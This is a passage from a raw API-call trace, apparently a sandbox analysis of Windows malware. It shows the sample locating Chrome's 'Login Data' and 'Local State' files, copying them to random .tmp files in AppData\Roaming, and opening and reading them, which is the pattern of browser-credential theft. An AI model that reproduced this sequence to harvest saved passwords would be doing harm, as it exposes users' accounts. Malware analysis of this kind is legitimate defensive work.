State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.370] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0202.371] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.371] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH.tmp" [0202.371] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.371] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0202.371] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0202.372] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0202.372] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0202.372] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0202.372] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0202.372] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.372] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0202.372] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.373] lstrlenW (lpString="\\Google\\Chrome\\User Data\\Default\\Login Data") returned 43 [0202.373] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0202.373] lstrlenW (lpString="\\Google\\Chrome\\User Data\\Default\\Login Data") returned 43 [0202.373] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Google\\Chrome\\User Data\\Default\\Login Data" | out: lpString1="\\Google\\Chrome\\User Data\\Default\\Login Data") returned="\\Google\\Chrome\\User Data\\Default\\Login Data" [0202.373] lstrlenW (lpString="\\Google\\Chrome\\User Data\\Default\\Login Data") returned 43 [0202.373] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0202.373] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.373] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x2e00000 [0202.374] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.374] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Google\\Chrome\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" [0202.374] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.374] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0202.374] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0202.374] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0202.375] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0202.375] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0202.375] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0202.375] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.375] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0202.375] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.375] lstrlenW (lpString="\\Google\\Chrome\\User Data\\Local State") returned 36 [0202.375] VirtualAlloc (lpAddress=0x0, dwSize=0x4a, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0202.376] lstrlenW (lpString="\\Google\\Chrome\\User Data\\Local State") returned 36 [0202.376] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Google\\Chrome\\User Data\\Local State" | out: lpString1="\\Google\\Chrome\\User Data\\Local State") returned="\\Google\\Chrome\\User Data\\Local State" [0202.376] lstrlenW (lpString="\\Google\\Chrome\\User Data\\Local State") returned 36 [0202.376] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0202.376] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.376] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0202.376] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.377] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Google\\Chrome\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" [0202.377] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.377] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 1 [0202.462] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned 1 [0202.463] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aibiywy.tmp"), bFailIfExists=0) returned 1 [0202.678] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eIdnomH.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eidnomh.tmp"), bFailIfExists=0) returned 1 [0202.979] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned 57 [0202.979] VirtualAlloc (lpAddress=0x0, dwSize=0x74, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0202.979] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" [0202.979] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.979] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned 57 [0202.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0202.980] VirtualAlloc (lpAddress=0x0, dwSize=0x39, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0202.980] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned 57 [0202.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", cchWideChar=57, lpMultiByteStr=0x2eb0000, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", lpUsedDefaultChar=0x0) returned 57 [0202.980] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned 57 [0202.980] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned 57 [0202.980] VirtualAlloc (lpAddress=0x0, dwSize=0x39, flAllocationType=0x3000, flProtect=0x4) returned 0x2ec0000 [0202.980] lstrcpyA (in: lpString1=0x2ec0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" [0202.981] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.981] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned 57 [0202.981] VirtualAlloc (lpAddress=0x0, dwSize=0x3a, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0202.981] lstrcatA (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" [0202.981] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.982] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.998] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x28) returned 0x2e10a78 [0203.015] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x2e10aa8 [0203.028] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e10aa8 | out: hHeap=0x2e10000) returned 1 [0203.041] GetSystemInfo (in: lpSystemInfo=0x44dec40 | out: lpSystemInfo=0x44dec40*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0203.041] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e10a78 | out: hHeap=0x2e10000) returned 1 [0203.041] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x208) returned 0x2e10a78 [0203.041] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x28) returned 0x2e10c88 [0203.056] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x50) returned 0x2e10cb8 [0203.056] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x2e10d10 [0203.071] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x30) returned 0x2e10d38 [0203.071] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x50) returned 0x2e10d70 [0203.071] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x2e10dc8 [0203.071] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x50) returned 0x2e10df0 [0203.071] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x2e10e48 [0203.086] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x38) returned 0x2e10e70 [0203.086] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x68) returned 0x2e10eb0 [0203.096] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x218) returned 0x2e12150 [0203.096] GetVersionExW (in: lpVersionInformation=0x415f674*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x5, dwMinorVersion=0x1082a, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="\x9e") | out: lpVersionInformation=0x415f674*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0203.096] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2dd0000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0203.096] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x74) returned 0x2e12370 [0203.096] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2dd0000, cbMultiByte=-1, lpWideCharStr=0x2e12370, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned 58 [0203.096] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0203.096] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x7a) returned 0x2e123f0 [0203.096] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", nBufferLength=0x3d, lpBuffer=0x2e123f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", lpFilePart=0x0) returned 0x39 [0203.096] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e12370 | out: hHeap=0x2e10000) returned 1 [0203.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0203.096] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x3a) returned 0x2e12370 [0203.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", cchWideChar=-1, lpMultiByteStr=0x2e12370, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", lpUsedDefaultChar=0x0) returned 58 [0203.096] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e123f0 | out: hHeap=0x2e10000) returned 1 [0203.105] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e12370 | out: hHeap=0x2e10000) returned 1 [0203.105] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x228) returned 0x2e12370 [0203.105] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e12150 | out: hHeap=0x2e10000) returned 1 [0203.120] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e124d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0203.120] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x74) returned 0x2e12150 [0203.120] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e124d8, cbMultiByte=-1, lpWideCharStr=0x2e12150, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned 58 [0203.120] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aibiywy.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0203.120] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e124d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0203.120] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x74) returned 0x2e121d0 [0203.120] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e124d8, cbMultiByte=-1, lpWideCharStr=0x2e121d0, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned 58 [0203.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0203.120] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x7a) returned 0x2e12250 [0203.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", nBufferLength=0x3d, lpBuffer=0x2e12250, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", lpFilePart=0x0) returned 0x39 [0203.120] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e121d0 | out: hHeap=0x2e10000) returned 1 [0203.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0203.120] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x3a) returned 0x2e121d0 [0203.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", cchWideChar=-1, lpMultiByteStr=0x2e121d0, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp", lpUsedDefaultChar=0x0) returned 58 [0203.120] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e12250 | out: hHeap=0x2e10000) returned 1 [0203.120] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e121d0 | out: hHeap=0x2e10000) returned 1 [0203.120] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x415f41c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0203.120] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x74) returned 0x2e121d0 [0203.120] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x415f41c, cbMultiByte=-1, lpWideCharStr=0x2e121d0, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp") returned 58 [0203.121] GetDiskFreeSpaceW (in: lpRootPathName="C:", lpSectorsPerCluster=0x415f1e8, lpBytesPerSector=0x415f1e4, lpNumberOfFreeClusters=0x415f1e8, lpTotalNumberOfClusters=0x415f1e8 | out: lpSectorsPerCluster=0x415f1e8, lpBytesPerSector=0x415f1e4, lpNumberOfFreeClusters=0x415f1e8, lpTotalNumberOfClusters=0x415f1e8) returned 1 [0203.121] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e121d0 | out: hHeap=0x2e10000) returned 1 [0203.121] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e12150 | out: hHeap=0x2e10000) returned 1 [0203.127] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x408) returned 0x2e125a0 [0203.137] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x415f8d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x415f8d8*=0) returned 0x0 [0203.137] ReadFile (in: hFile=0x2a0, lpBuffer=0x415f948, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x415f8e4, lpOverlapped=0x0 | out: lpBuffer=0x415f948*, lpNumberOfBytesRead=0x415f8e4*=0x64, lpOverlapped=0x0) returned 1 [0203.138] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x808) returned 0x2e129b0 [0203.138] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e125a0 | out: hHeap=0x2e10000) returned 1 [0203.149] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x2e12150 [0203.149] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x2e121b0 [0203.157] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x38) returned 0x2e10f20 [0203.168] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xbb88) returned 0x2e131c0 [0203.169] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.170] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a4 [0203.170] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x415f9dc | out: lpFileSize=0x415f9dc*=67626) returned 1 [0203.170] LocalAlloc (uFlags=0x40, uBytes=0x1082a) returned 0x93af70 [0203.170] ReadFile (in: hFile=0x2a4, lpBuffer=0x93af70, nNumberOfBytesToRead=0x1082a, lpNumberOfBytesRead=0x415f9e4, lpOverlapped=0x0 | out: lpBuffer=0x93af70*, lpNumberOfBytesRead=0x415f9e4*=0x1082a, lpOverlapped=0x0) returned 1 [0203.170] CloseHandle (hObject=0x2a4) returned 1 [0203.170] LocalAlloc (uFlags=0x40, uBytes=0x21056) returned 0x970fd0 [0203.171] LocalFree (hMem=0x970fd0) returned 0x0 [0203.172] LocalFree (hMem=0x93af70) returned 0x0 [0203.186] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x240) returned 0x2e125a0 [0203.193] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x658) returned 0x2e1ed50 [0203.193] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x240) returned 0x2e1f3b0 [0203.193] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x658) returned 0x2e1f5f8 [0203.193] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x2e12210 [0203.193] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x2e12230 [0203.193] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e12290 [0203.193] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xc8) returned 0x2e127e8 [0203.193] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e122a8 [0203.193] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e122c0 [0203.194] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e122d8 [0203.194] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x2e122f0 [0203.194] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e12310 [0203.194] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x2e12328 [0203.194] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e12348 [0203.194] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e128b8 [0203.194] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e128d0 [0203.194] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x2e128e8 [0203.194] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xf8) returned 0x2e1fc58 [0203.194] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x408) returned 0x44f0048 [0203.195] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1f5f8 | out: hHeap=0x2e10000) returned 1 [0203.195] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1f3b0 | out: hHeap=0x2e10000) returned 1 [0203.195] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0048 | out: hHeap=0x2e10000) returned 1 [0203.195] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1fc58 | out: hHeap=0x2e10000) returned 1 [0203.195] LockFile (hFile=0x2a0, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0) returned 1 [0203.195] LockFileEx (in: hFile=0x2a0, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x415f44c | out: lpOverlapped=0x415f44c) returned 1 [0203.195] UnlockFile (hFile=0x2a0, 